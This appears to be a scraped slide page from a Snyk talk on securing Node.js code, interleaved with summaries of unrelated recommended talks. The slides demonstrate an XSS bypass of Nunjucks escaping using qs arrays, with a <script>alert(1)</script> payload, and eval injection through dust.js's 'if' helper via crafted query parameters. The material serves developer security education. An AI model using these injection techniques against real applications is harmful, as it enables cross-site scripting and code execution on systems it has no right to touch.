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Secure Node Code
Guy Podjarny
Danny Grander
• Guy Podjarny, @guypod on Twitter
• CEO & Co-founder at Snyk
• History:
• Cyber Security part of Israel Defense Forces
• First Web App Firewall (AppShield), Dynamic/Static Tester (AppScan)
• Security: Worked in Sanctum -> Watchfire -> IBM
• Performance: Founded Blaze -> CTO @Akamai
• O’Reilly author, speaker
• Danny Grander, @grander on Twitter
• Chief Research Officer & Co-founder at Snyk
• History:
• Cyber Security part of Israel Defense Forces
• Startup work on embedded security and crypto
• CTO at Gita, security consultancy (acquired by Verint)
• Speaker, blogger
• Intro & Setup
• Insecure Code
• Encodings
• Type Manipulation
• Injection
• Event Loop
• Insecure Dependencies
• Summary

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Batten Down the Hatches: A Practical Guide to Securing Kubernetes - RMISC 2019
Batten Down the Hatches: A Practical Guide to Securing Kubernetes - RMISC 2019Batten Down the Hatches: A Practical Guide to Securing Kubernetes - RMISC 2019
Batten Down the Hatches: A Practical Guide to Securing Kubernetes - RMISC 2019

James Condon presented a guide to securing Kubernetes. He began with an overview of Kubernetes architecture and then discussed major risk vectors like exposed Kubernetes components and pod compromise. He demonstrated finding exposed Kubernetes dashboards, API servers, kubelets, and etcd clusters. Condon recommended 10 essential practices for securing Kubernetes, including network security, role-based access control, security boundaries, upgrading, and audit logging. He concluded with resources for further information.

When the internet bleeded : RootConf 2014
When the internet bleeded : RootConf 2014When the internet bleeded : RootConf 2014
When the internet bleeded : RootConf 2014

The document discusses various SSL/TLS security issues including Heartbleed, GNUTLS bugs, Apple bugs, Lucky13, BEAST, and CRIME. It provides details on the Heartbleed bug in OpenSSL, explaining how it allowed retrieval of up to 64KB of private data from affected servers. It also discusses other exploits like BEAST, CRIME, and Lucky13. The document advises administrators to patch systems, monitor for issues, and leverage big data to identify anomalies. Developers are advised to carefully manage library dependencies and versions to prevent vulnerabilities.

rootconfheartbleedinformation security
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
Fruit vs Zombies:  Defeat Non-jailbroken iOS Malware by Claud XiaoFruit vs Zombies:  Defeat Non-jailbroken iOS Malware by Claud Xiao
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao

Since 2014, fifteen new malware or riskware families successfully attacked non-jailbroken iOS devices (e.g., WireLurker, Oneclickfraud, XcodeGhost, InstaAgent, ZergHelper, AceDeceiver), affected thousands of iOS apps and tens of millions users around the world. Ten of them even bypassed Apple’s code vetting and occurred at App Store. In this presentation, we will systematically study how could these malware, riskware and some Proof-of-Concepts infect non-jailbroken devices via practical vectors and approaches including abusing development certificates, bypassing code review by obfuscation, performing FairPlay MITM attack, abusing MDM solution, abusing private APIs, exploiting design flaws or app level vulnerabilities, and stealing privacy data. For each topic, we will introduce its implementation, explore real world cases, analyze its risky and consequences, explain Apple’s countermeasures, and discuss why some problems will still exist in near future. We will also share some stories of how we discovered those interesting iOS malware. Through this topic, audiences could make more effective policies to protect iOS devices in their organizations, build their own systems/tools to evaluate security risks in iOS apps, and hunt more iOS malware in the future.
• Goof:
• Exploits under
• Optional: install locally (requires Node & npm)

$ git clone

$ cd goof

$ npm install

$ npm start # will run on localhost:3001
3.5M Node.js Developers
growing 100% year over year
JS top used language

Recommended for you

CSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application securityCSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application security

This document discusses shared libraries and security vulnerabilities in Windows applications. It describes a system called Project A'Tuin that can automatically install software, detect insecure behaviors, and identify shared libraries used. The system found over 4000 shared libraries in sample applications, including outdated versions of OpenSSL affected by known vulnerabilities. Future work includes expanding behavior detection across platforms and open sourcing the system.

Sec4dev 2021 - Catch Me If You can : Continuous Delivery vs. Security Assurance
Sec4dev 2021  - Catch Me If You can : Continuous Delivery vs. Security AssuranceSec4dev 2021  - Catch Me If You can : Continuous Delivery vs. Security Assurance
Sec4dev 2021 - Catch Me If You can : Continuous Delivery vs. Security Assurance

DevOps and Continuous Delivery has changed how technology operates and how business is run, but security continues to struggle to catch-up with the velocity of change in this new world : it’s almost a cat-and-mouse game when it comes to spot security holes into code before delivering to production, and traditional manual security assessment just continue to be untenable as a way of working with modern agile teams. The concept of DevSecOps can be the ultimate answer, but unfortunately most articles and vendor pitches about this subject are incredibly superficial, and it’s all about dumping existing/traditional security tools on developers, which adds more complexity and frustration without solving the real problem. “Modern problems require modern solutions” : this talk explains the evolution of security tooling over the last years, and how they must change (or has changed) to match the macro trends and keep up with the shifting threat. As an example, this talk demonstrates how modern “lightweight” code analysis techniques, when combined with secure-by-default frameworks/patterns, can be used to easily detect potential holes within a code base, and provide accurate/fast feedbacks to developers.

DevSecCon Tel Aviv 2018 - End2End containers SSDLC by Vitaly Davidoff
DevSecCon Tel Aviv 2018 - End2End containers SSDLC by Vitaly DavidoffDevSecCon Tel Aviv 2018 - End2End containers SSDLC by Vitaly Davidoff
DevSecCon Tel Aviv 2018 - End2End containers SSDLC by Vitaly Davidoff

This document discusses securing the software development lifecycle (SDLC) when using containers. It begins with an introduction to SDLC models like waterfall and agile. It then covers challenges in applying application security with containers, including unclear boundaries and responsibilities. The main body details how to apply security practices at each phase of the SDLC for containers: requirements, design, implementation, testing, and operations. Key practices include threat modeling, secure coding, image validation, and monitoring. It concludes with emphasizing the importance of involving security champions throughout the process.

devseccon tel aviv 2018devsecopscontainers
npm growth
Growing in Enterprise
Key Strength 1:

Same lang on client & server
Key Strength 2:

Naturally scalable

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Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack

This document discusses anatomy of cloud hacks by analyzing past data breaches and vulnerabilities. It begins by looking at known attacks where compromised infrastructure was based in the cloud. Specific case studies of attacks on Code Spaces, Olindata, and Tesla are described. The document then covers techniques for enumerating cloud services and resources like storage containers. Methods for gaining an initial foothold like leaked credential hunting and exploiting server-side request forgery are also outlined.

DevSecOps: What Why and How : Blackhat 2019
DevSecOps: What Why and How : Blackhat 2019DevSecOps: What Why and How : Blackhat 2019
DevSecOps: What Why and How : Blackhat 2019

This document discusses DevSecOps, including what it is, why it is needed, and how to implement it. DevSecOps aims to integrate security tools and a security-focused culture into the development lifecycle. It allows security to keep pace with rapid development. The document outlines how to incorporate security checks at various stages of the development pipeline from pre-commit hooks to monitoring in production. It provides examples of tools that can be used and discusses cultural and process aspects of DevSecOps implementation.

devsecopsinformation securitytools
[OWASP Poland Day] Application security - daily questions & answers
[OWASP Poland Day] Application security - daily questions & answers[OWASP Poland Day] Application security - daily questions & answers
[OWASP Poland Day] Application security - daily questions & answers

This document discusses various application security topics such as downloading files securely, handling secrets and temporary tokens, implementing third-party sites securely, privacy risks of third-party monitoring and analytics on sensitive pages, push notifications versus SMS, securely using FFmpeg and ImageMagick, serving user content securely, implementing cryptography securely, and applying rate limits. It provides advice on how to address each topic securely, such as only allowing certain schemes, ports and domains for file downloads, short expiration times for temporary tokens, sandboxing or isolating third-party components, and not implementing one's own crypto.

Key Strength 3:

Easy & fast to start
Node.js foundation
Some history…
Node.js Security
Good Node.js core security

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[Wroclaw #2] iOS Security - 101
[Wroclaw #2] iOS Security - 101[Wroclaw #2] iOS Security - 101
[Wroclaw #2] iOS Security - 101

This document summarizes iOS security features and risks for mobile applications. It outlines the typical architecture of an iOS app, including protection features like ASLR, non-executable memory, ARC, code signing, and sandboxing. It also discusses tools for analyzing iOS apps and potential risks like insecure data storage, lack of transport layer protection, unintended data leakage, poor authentication, and lack of binary protections. The document demonstrates examples of using tools like Cycript, Clutch, and Class-dump to inspect apps and decrypt or dump classes from binaries.

DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates  - AppSec USA 2016DevOops Redux Ken Johnson Chris Gates  - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016

In a follow-up to the duo’s offensive focused talk “DevOops, How I hacked you”, they discuss defensive countermeasures and real experiences in preventing attacks that target flaws in your DevOps environments. In this talk, Chris and Ken describe common ways in which DevOps environments fall prey to malicious actors with a focus on preventative steps. The team will present their recommended approach to hardening for teams using AWS, Continuous Integration, GitHub, and common DevOps tools and processes. More specifically, the following items will be demonstrated: -AWS Hardening -AWS Monitoring -AWS Disaster Recovery -GitHub Monitoring -OPINT -Software Development Practices/Processes -Secure use of Jenkins/Hudson -Developer laptop hardening (OS X)

Web & Cloud Security in the real world
Web & Cloud Security in the real worldWeb & Cloud Security in the real world
Web & Cloud Security in the real world

This document discusses web and cloud security challenges. It begins with an introduction of the speaker and their background in security research. Various web attacks like SQL injection, cross-site scripting, and remote code execution are explained. Cloud security threats from misconfigured applications and infrastructure are also examined, including real-world examples. Best practices for hardening systems and securing data in the cloud are provided. Resources for further learning about web and cloud security are listed at the end.

Security a top priority
for Node.js foundation
Low Ecosystem

Security Awareness
outside of core
Most vulns have no CVE
Not enough research
At least we have ChALkeR…

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[OWASP Poland Day] Saving private token
[OWASP Poland Day] Saving private token[OWASP Poland Day] Saving private token
[OWASP Poland Day] Saving private token

The document discusses securely storing authentication tokens on Android devices. It recommends always encrypting sensitive data like tokens or credentials. Below Android 6 there are issues with the keystore, but on Android 6 and above the keystore is improved and backed by the lock screen for secure storage. It provides examples of using libraries like AesCbcWithIntegrity to encrypt and decrypt data using a password derived from a user PIN, and storing the encrypted data and salt in SharedPreferences. This provides a secure way to store tokens that doesn't require the user to login each time even if the phone is stolen or rooted.

Containerizing your Security Operations Center
Containerizing your Security Operations CenterContainerizing your Security Operations Center
Containerizing your Security Operations Center

AppSec USA 2016 talk on using containers and Kubernetes to manage a variety of security tools. Includes best practices for securing Kubernetes implementations.

information securitykubernetesdocker
Static Analysis For Security and DevOps Happiness w/ Justin Collins
Static Analysis For Security and DevOps Happiness w/ Justin CollinsStatic Analysis For Security and DevOps Happiness w/ Justin Collins
Static Analysis For Security and DevOps Happiness w/ Justin Collins

Justin Collins, Brakeman Security It is not enough to have fast, automated code deployment. We also need some level of assurance the code being deployed is stable and secure. Static analysis tools that operate on source code can be an efficient and reliable method for ensuring properties about the code - such as meeting basic security requirements. Automated static analysis security tools help prevent vulnerabilities from ever reaching production, while avoiding slow, fallible manual code reviews. This talk will cover the benefits of static analysis and strategies for integrating tools with the development workflow.

securitydevopsall day devops
Not enough 

security dialogue
hence this session!
• Intro & Setup
• Insecure Code
• Encodings
• Type Manipulation
• Injection
• Event Loop
• Insecure Dependencies
• Summary
URL Encoding

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[Wroclaw #5] OWASP Projects: beyond Top 10
[Wroclaw #5] OWASP Projects: beyond Top 10[Wroclaw #5] OWASP Projects: beyond Top 10
[Wroclaw #5] OWASP Projects: beyond Top 10

- Breakers (WebGoat, OWTF, ZAP, Testing Guide) - Pawel Rzepa, Andrii Sygida, Daniel Ramirez - Builders (Security Knowledge Framework, CheatSheets, Cornucopia) - Alexander Antukh, Andrii Sygida - Defenders (ASVS, MASVS, Pipeline) - Marek Puchalski, Andrii Sygida

Fortify dev ops (002)
Fortify   dev ops (002)Fortify   dev ops (002)
Fortify dev ops (002)

The document discusses Fortify and DevOps for MBFS. It provides an overview of the DevOps lifecycle including planning, development, testing, release decision making, and deploying applications. It then summarizes Hewlett Packard Enterprise's end-to-end application security solution using Fortify on Demand, App Defender, and other tools to integrate security across the development lifecycle and provide protection for applications in production. Charts show the top vulnerability categories and application logging categories detected by Application Defender in February 2016. The document concludes by thanking the readers and providing contact information for Mike Coleman and Thomas Ryan from HPE to answer any questions.

CBDW2014 - MockBox, get ready to mock your socks off!
CBDW2014 - MockBox, get ready to mock your socks off!CBDW2014 - MockBox, get ready to mock your socks off!
CBDW2014 - MockBox, get ready to mock your socks off!

Mock what? What Mock?Learn What is Mocking, and how to use Mocking with ColdFusion testing, development, and continuous integration. Look at Mocking and Stubbing with a touch of Theory and a lot of Examples, including what you could test, and what you should test… and what you shouldn't test (but might be fun).

HTML Entities
Insecure Default Config
Data URI
Template engine escaping

Recommended for you

Automated malware analysis
Automated malware analysisAutomated malware analysis
Automated malware analysis

The document discusses automating the process of analyzing mobile malware. It describes standard tools and techniques used in static and dynamic malware analysis of Android APK files. These include strings analysis, disassembling code, decompiling applications, monitoring network activity, and using strace and ltrace. The document proposes automating these analysis steps through scripting to quickly analyze Android apps for malware.

Detecting headless browsers
Detecting headless browsersDetecting headless browsers
Detecting headless browsers

This presentation by Sergey Shekyan and Bei Zhang discusses offensive use of headless browsers tools, and how to counteract them in practice.

javascriptsecurityheadless browsers
Webinar–Mobile Application Hardening Protecting Business Critical Apps
Webinar–Mobile Application Hardening Protecting Business Critical AppsWebinar–Mobile Application Hardening Protecting Business Critical Apps
Webinar–Mobile Application Hardening Protecting Business Critical Apps

During this talk, we looked at some of the typical controls that Android/iOS applications exhibit, how they work, how to spot them, and how to sidestep them. We’ll demonstrate analysis and techniques using free open source tooling such as Radare and Frida, and for some parts, we’ll use IDA Pro. And since “automation” is the buzzword of the year, we’ll discuss how to automate some of these activities, which typically take up most of the assessment window. For more information, please visit our website at

web application securitymobile application developmentsoftware security testing
{{{val}}} vs {{val}}
Crazy Encoding
How to defend?
It’s complicated.
Lots of variants, ever shifting

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Appsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaolaAppsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaola

This document summarizes Stefano di Paola's talk on security issues with JavaScript libraries. It discusses how jQuery's $() method can be considered a "sink" that executes HTML passed to it, including examples of XSS via jQuery selectors and AJAX calls. It also covers problems with JSON parsing regular expressions, AngularJS expression injection, and credentials exposed in URLs. Solutions proposed include validating all input, auditing third-party libraries, and moving away from approaches like eval() that execute untrusted code.

Ci for i-os-codemash-01.2013
Ci for i-os-codemash-01.2013Ci for i-os-codemash-01.2013
Ci for i-os-codemash-01.2013

This document provides tips for implementing continuous integration (CI) for iOS projects. It recommends starting with the basics of Xcode and the command line, as well as version control and a CI server like Jenkins. Key tips include using scripts instead of plugins for more flexibility, being specific with xcodebuild options, specifying alternate output locations, and ensuring return codes. It also discusses automating tests, code coverage, documentation, and deployment to TestFlight for QA testing. The goal of CI for iOS is to automate building, testing, and deploying code changes to catch issues early and improve quality.

IstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ -  Automated Malware AnalysisIstSec'14 - İbrahim BALİÇ -  Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware Analysis

The document discusses automating mobile malware analysis processes. It introduces the speaker as a security researcher who works on various online and offline projects related to mobile security. The rest of the document discusses standard processes for static and dynamic malware analysis, including decompiling APK files, disassembling codes, analyzing network activity, and using tools like emulator, adb, and strace. It emphasizes that automating these processes through scripting can help analyze malware more efficiently.

Use Frameworks
Not perfect, but typically better than custom code
Frameworks are generic.

You can be specific.
Use application knowledge to explicitly specify what’s allowed
Critique default config
And use the right framework functions
Building your own?

Consider all encodings
Missing one variant is all it takes…

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Node azure
Node azureNode azure
Node azure

This document provides an overview of Node.js including: - What Node.js is and its event-driven, non-blocking architecture - How to install Node.js and build applications - How to use modules like Express.js and - Examples of deploying Node.js applications to Microsoft Azure - A demonstration of building a collaborative drum machine app with Node.js, WebSockets, and the Web Audio API

J1 2015 "Debugging Java Apps in Containers: No Heavy Welding Gear Required"
J1 2015 "Debugging Java Apps in Containers: No Heavy Welding Gear Required"J1 2015 "Debugging Java Apps in Containers: No Heavy Welding Gear Required"
J1 2015 "Debugging Java Apps in Containers: No Heavy Welding Gear Required"

It’s easy to get seduced by being able to quickly deploy and scale applications by using containers. However, when things inevitably go wrong, how do you debug your application? This session covers various pro bug hunting tips and tricks. It shows live demos of tools such as the Docker stats API, Docker exec (and top, vmstat, and netstat), and how to use the ELK stack for centralized logging. It also dives into other more sophisticated tools that operate at the application and (micro)service layer, such as Twitter’s Zipkin tracing app, Spring Boot’s Actuator, and DropWizard’s Metrics library. Keep those container-based nightmares away by ensuring that when the worst does happen, you have the tools, info, and experience to debug containerized applications. Presented at JavaOne 2015 with Steve Poole


The document discusses DWANGO's use of Scala and the Play framework to build APIs for niconico's Android app. It summarizes the project's history and team structure, describes the core library, API server, and management server built using Scala, and outlines some pros and cons they experienced like case class limitations, Jenkins memory issues, and Akka exceptions in Play.
• Intro & Setup
• Insecure Code
• Encodings
• Type Manipulation
• Injection
• Event Loop
• Insecure Dependencies
• Summary
Type Manipulation
qs: query string parser

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Serverless Security: What's Left to Protect?
Serverless Security: What's Left to Protect?Serverless Security: What's Left to Protect?
Serverless Security: What's Left to Protect?

Slides from my ServerlessConf Austin 2017. Serverless means handing off server management to the cloud platforms - along with their security risks. With the “pros” ensuring our servers are patched, what’s left for application owners to protect? As it turns out, quite a lot. This talk discusses the aspects of security serverless doesn’t solve, the problems it could make worse, and the tools and practices you can use to keep yourself safe

TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)
TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)
TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)

In this presentation, I present an automatically disarmament system for armed malware with anti-sandboxing. The system targets on 1) Host-fingerprinting malware like citadel, 2) armed malware with general anti-sandboxng for automated sandbox analyzer. An approach of disarmament focuses on exit reason and exit before activity in malware execution. I have developing CPU emulator-based disarmament system with instrumentation. The system suggests a suitable environment for dynamic analysis for individual malware.

Practical JavaScript Programming - Session 8/8
Practical JavaScript Programming - Session 8/8Practical JavaScript Programming - Session 8/8
Practical JavaScript Programming - Session 8/8

This document discusses various development tools for JavaScript programming, including Node.js, TypeScript, Babel, linters, task runners, module bundlers, and testing tools. It provides descriptions and examples of using Node.js, Yarn, TypeScript, Babel, ESLint, TSLint, Grunt, Gulp, Webpack, Chrome DevTools, Jasmine, Mocha, Chai, Karma, Selenium, Protractor, PhantomJS, and CasperJS. The document aims to help programmers select and use the appropriate tools at different stages of development.

28M downloads/month
Not officially part of Node, but de-facto standard
{ a: “foo”}
{ a: “foo”, b: “bar”}

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From Thousands of Hours to a Couple of Minutes: Automating Exploit Generation...
From Thousands of Hours to a Couple of Minutes: Automating Exploit Generation...From Thousands of Hours to a Couple of Minutes: Automating Exploit Generation...
From Thousands of Hours to a Couple of Minutes: Automating Exploit Generation...

Writing a working exploit for a vulnerability is generally challenging, time-consuming, and labor-intensive. To address this issue, automated exploit generation techniques can be adopted. In practice, existing techniques however exhibit an insufficient ability to craft exploits, particularly for the kernel vulnerabilities. On the one hand, this is because their technical approaches explore exploitability only in the context of a crashing process whereas generating an exploit for a kernel vulnerability typically needs to vary the context of a kernel panic. On the other hand, this is due to the fact that the program analysis techniques used for exploit generation are suitable only for simple programs but not the OS kernel which has higher complexity and scalability. In this talk, we will introduce and release a new exploitation framework to fully automate the exploitation of kernel vulnerabilities. Technically speaking, our framework utilizes a kernel fuzzing technique to diversify the contexts of a kernel panic and then leverages symbolic execution to explore exploitability under different contexts. We demonstrate that this new exploitation framework facilitates exploit crafting from many aspects. First, it augments a security analyst with the ability to automate the identification of system calls that he needs to take advantages for vulnerability exploitation. Second, it provides security analysts with the ability to achieve security mitigation bypassing. Third, it allows security analysts to automatically generate exploits with different exploitation objectives (e.g., privilege escalation or data leakage). Last but not least, it equips security analysts with an ability to generate exploits even for those kernel vulnerabilities for which the exploitability has not yet been confirmed or verified. Along with this talk, we will also release many unpublished working exploits against several kernel vulnerabilities. It should be noted that, the vulnerabilities we experimented cover primarily Use-After-Free and heap overflow. Among all these test cases, more than 50% of them do not have working exploits publicly available. To illustrate this release, I have already disclosed one working exploit at my personal website ( The exploit released on my site pertains to CVE-2017-15649 for which there has not yet been an exploit publicly available with the demonstration of bypassing SMAP.

Steelcon 2015 Reverse-Engineering Obfuscated Android Applications
Steelcon 2015 Reverse-Engineering Obfuscated Android ApplicationsSteelcon 2015 Reverse-Engineering Obfuscated Android Applications
Steelcon 2015 Reverse-Engineering Obfuscated Android Applications

This document summarizes a presentation on reverse engineering obfuscated Android applications. It discusses reverse engineering techniques like static and dynamic analysis. It covers analyzing the Android application package (APK) file format and tools like apktool, smali, baksmali, and dex2jar. Common obfuscation techniques like string encryption, call hiding using reflection, and native code are also summarized. The document concludes by recommending further reading on tools and the arms race between attackers and defenders applying obfuscation.

reverse engineeringandroidapk
Snyk Intro - Developer Security Essentials 2022
Snyk Intro - Developer Security Essentials 2022Snyk Intro - Developer Security Essentials 2022
Snyk Intro - Developer Security Essentials 2022

Overwhelmed with security issues in your Node.js applications? Not entirely sure how to write secure code? Join us in this workshop where you’ll learn how to improve security without being a security professional. We’ll use Snyk Code’s VS Code extension to catch and find security issues while you code, automatically fix security issues in your open source libraries, and see first-hand how to weaponize vulnerabilities to exploit working Node.js applications. You will also learn about the multiple ways of using Snyk to secure your projects, from the CLI, to CI/CD pipelines with GitHub Actions, and extend your know from secure code and secure dependencies to that of building secure containers to your Node.js apps on Docker.

securityinformation securitynodejs security
{ a: [ “foo”, “bar”]}
{ a: [ “foo”]}
{ a: [ “foo”, “bar”]}
{ a: [ “foo”, “bar”]}

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Codestrong 2012 breakout session hacking titanium
Codestrong 2012 breakout session   hacking titaniumCodestrong 2012 breakout session   hacking titanium
Codestrong 2012 breakout session hacking titanium

The document discusses Titanium and ways to improve the development experience through tools like TiShadow and Cornwall. TiShadow acts as a proxy for the Titanium SDK, allowing developers to code on any device by bundling, rewriting, and sending code to devices. Cornwall allows executing native Titanium code from the web by passing functions and data between the web and native contexts. These tools help developers code in Titanium on any device and more easily pass data and functions between the web and native worlds.

codestrong 2012
OWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript ApplicationsOWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript Applications

The document provides an overview of reviewing modern JavaScript applications for security. It discusses how JavaScript is used widely, common frameworks like React and Angular, and tools for analyzing JavaScript like ESLint. It also covers real-world examples of vulnerabilities like cross-site scripting and remote code execution. The talk emphasizes embracing developer tools and best practices like code reviews and linting to identify security issues in JavaScript applications.

code analysisjavascriptsecurity
Security testing of YUI powered applications
Security testing of YUI powered applicationsSecurity testing of YUI powered applications
Security testing of YUI powered applications Everyone agrees that application security is of crucial importance, and attacks on web frontends are getting more frequent, sophisticated, and dangerous. Yet the area of security testing of frontend and YUI-based applications has so far received little attention. This talk highlights the need to embed security testing in the standard repertoire of every Javascript and YUI developer, alongside with functionality and performance tests. We will emphasize the security testing as part of development workflow - writing and running tests alongside creating the code. Our main goal is to attract the YUI community's attention to this grey area and start a discussion and cooperation of webappsec and YUI worlds.

Input Type not guaranteed
But that’s not always intuitive…
Example: Nunjucks
Client Side JS execution
Mozilla templating library
3,500 stars, 320 forks, 150k downloads/month
Sanitization Logic
'Hello {{ username }}’,
{username: '<s>Matt</s>' });
Hello &lt;s&gt;Matt&lt;s&gt;

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Server Side JavaScript - You ain't seen nothing yet
Server Side JavaScript - You ain't seen nothing yetServer Side JavaScript - You ain't seen nothing yet
Server Side JavaScript - You ain't seen nothing yet

This document discusses using JavaScript on the server side with Node.js and the YUI framework. It begins by explaining why server-side JavaScript is useful and discusses JavaScript runtimes like V8, SpiderMonkey, and Rhino. It then covers Node.js, CommonJS frameworks, and how to use YUI modules on the server by enabling YUI's module loader. Examples are provided for accessing remote data, rendering HTML on the server, and implementing progressive enhancement.

High Performance Images: Beautiful Shouldn't Mean Slow (Velocity EU 2015)
High Performance Images: Beautiful Shouldn't Mean Slow (Velocity EU 2015)High Performance Images: Beautiful Shouldn't Mean Slow (Velocity EU 2015)
High Performance Images: Beautiful Shouldn't Mean Slow (Velocity EU 2015)

The web is becoming increasingly image rich. Between high-resolution mobile screens, Pinterest-style design, and big background graphics, the average image payload has more than doubled in the last three years. While visually appealing, these images carry a substantial performance cost, and — if not optimized correctly — can make a web experience slow and painful, no matter how beautiful it is. In this tutorial we’ll discuss ways that let you provide the eye-pleasing experience you want without sacrificing your site’s performance.You’ll learn about the three primary aspects of image optimization: - Image compression: how to best encode your images, delivering the same picture with the fewest bytes - Image loading: once your files are as small as they can be, we’ll cover the best ways to make them show up quickly in the browser - Operationalizing image optimization: different tools and techniques for integrating image optimization on your site Talk given at Velocity Conf EU 2015:

imagesresponsive web designperformance
HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)
HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)
HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)

When users use our sites, they put their faith in us. They trust we will keep their information from reaching others, believe we provided the information they see, and allow us to run (web) code on their devices. Using HTTPS to secure our conversations is a key part of maintaining this trust. If that’s not motivation enough, the web’s giants are actively promoting HTTPS, requiring it for features such as HTTP2 & ServiceWorker, using it for search engine ranking and more. To make the most of the web, you need to use HTTPS. This deck reviews what HTTPS is, discusses why you should prioritize using it, and cover some of the easiest (and most cost effective) steps to get started using HTTPS

Sanitization Code
escape: function(str) {
if(typeof str === 'string') {
return r.markSafe(lib.escape(str));
return str;
Sanitization Workaround
'Hello {{ username }}’,
{username: [‘<s>Matt</s>’] });
Hello <s>Matt</s>
qs + array = XSS
'Hello {{ username }}’,
{username: [‘<script>alert(1)</script>’] });
XSS: <script>alert(1)</script>matt
Fixed Sanitization Code
escape: function(str) {
if(str == null) str = '';
if(str instanceof r.SafeString) {
return str;
return r.markSafe(lib.escape(str.toString()));
Always returns a string

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High Performance Images: Beautiful Shouldn't Mean Slow
High Performance Images: Beautiful Shouldn't Mean SlowHigh Performance Images: Beautiful Shouldn't Mean Slow
High Performance Images: Beautiful Shouldn't Mean Slow

(slides from the O'Reilly webcast, see recording here: The web is becoming increasingly image rich. Between high-resolution mobile screens, Pinterest-style design and big background graphics, the average image payload has more than doubled in the last three years. While visually appealing, these images carry a substantial performance cost, and — if not optimized correctly — can make a web experience slow and painful, no matter how beautiful it is. These slides discuss how you can provide the eye-pleasing experience you want without sacrificing your site's performance. You'll learn about the three primary aspects of image optimization: Image Compression: How to best encode your images, delivering the same picture with the fewest bytes. Image Loading: Once your files are as small as they can be, we'll cover the best ways to make them show up quickly in the browser. Image Operations: Different tools and techniques for integrating image optimization on your site.

performanceweb performanceimage
Responsive In The Wild, 2014
Responsive In The Wild, 2014Responsive In The Wild, 2014
Responsive In The Wild, 2014

Slides from my Web Directions South 2014 Talk. Abstract: Responsive Web Design (RWD) is upon us, and it seems like every website has either gone responsive or planning to do so. And in this rush to implement – performance is left behind… Last November (2013), I ran a test identifying the responsive websites amongst the top 10,000 sites, and inspected their performance traits. The results were depressing, showing many sites have gone responsive, and hardly any tackled performance. In this talk, we’ll track the progress (or lack there of) we made as an industry. We’ll look at the results of a new test, tracking our progress in adopting RWD and – more importantly – in addressing its performance implications. We’ll share high level stats, highlight key trends, drill into representative examples, and come away with a better understanding of what we should be doing better, both on our own sites and as an industry

mobilerwdresponsive web design
Third Party Performance (Velocity, 2014)
Third Party Performance (Velocity, 2014)Third Party Performance (Velocity, 2014)
Third Party Performance (Velocity, 2014)

Third party components are a part of any modern site: JS libs, analytics, trackers, share buttons, ads. Many components, each adding its performance cost, cause render delays or can effectively take your site down. This isn’t your code nor your servers, so what can you do about it? This presentation will answer this question with strategies and tactics for keeping 3rd parties from taking you down. This talk was given at Velocity Santa Clara, 2014: The presentation from Velocity Santa Clara, 2014 (

webthird party performancebeacons
Example: dust.js
Server side JS execution
LinkedIn Templating Library
2,400 stars, 406 forks, 77k downloads/month
Discovered on Paypal
Reported responsibly:
“if”uses eval
"if": function( chunk, context, bodies, params ){
var body = bodies.block,
skip = bodies['else'];
if( params && params.cond){
var cond = params.cond;
cond = dust.helpers.tap(cond, chunk, context);
// eval expressions with given dust references
if(body) {
return chunk.render( bodies.block, context );
else {
_log("Missing body block in the if helper!");
return chunk;

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Rules driven-delivery
Rules driven-deliveryRules driven-delivery
Rules driven-delivery

This document discusses how a URL is no longer sufficient for content delivery given modern dynamic web pages. It proposes implementing "rules driven delivery" where delivery definitions are structured as reusable, hierarchical rules that define criteria for when to apply delivery behaviors. These rules would be pushed to CDN edges to enable offloading and improve performance over simply relying on URLs and caching. Examples of rules provided include redirecting mobile users, image format negotiation based on Accept headers, and granular caching based on request header values. The goal is more flexible content delivery and caching optimized for a wide variety of dynamic web page scenarios.

Responsive In The Wild (SmashingConf, 2014)
Responsive In The Wild (SmashingConf, 2014)Responsive In The Wild (SmashingConf, 2014)
Responsive In The Wild (SmashingConf, 2014)

Awareness to Responsive Web Design has grown substantially over the last few years, and practically any major organization has some RWD project in their Mobile Strategy decks. However, are we just talking about it, or actually doing it? I ran a mass test to identify the responsive websites amongst the top 100,000 websites in the world. Eventually, we'll be able to rerun this test to track RWD adoption over time, but for now we can use it to see how RWD sites compare to each other and to non-RWD sites. This short presentation, given over beers at the awesome SmashingConf, shares some such insights. A (slightly smaller) but more detailed description of the test can be found here:

Putting Your Images on a Diet (SmashingConf, 2014)
Putting Your Images on a Diet (SmashingConf, 2014)Putting Your Images on a Diet (SmashingConf, 2014)
Putting Your Images on a Diet (SmashingConf, 2014)

Images are quickly becoming one of the most critical factors for web performance. On one hand, users are demanding more visual websites, driving an increase in the number of images on a page and making background images cool again. On the other hand, technology trends such as Retina displays and RWD are making it much harder to choose the right image to download at any given time, avoiding the download of excess bytes. In this talk, I go over what you can do to maximize the impact of every image byte. I explain the concept of Image Compression, understand how it applies to different image formats, and show the tools and techniques you should use to communicate the best visuals with the fewest bytes. Lastly, I show how to combine image compression and Retina displays, and discuss some newer image formats and how you can take advantage of them today

image compressionmobileperformance
query to eval examples
http://host/navigation?device=xxx eval("'xxx' == 'desktop'");
http://host/navigation?device=mobile eval("'mobile' == 'desktop'");
http://host/navigation?device=x' eval(“‘x&#39;' == 'desktop'");
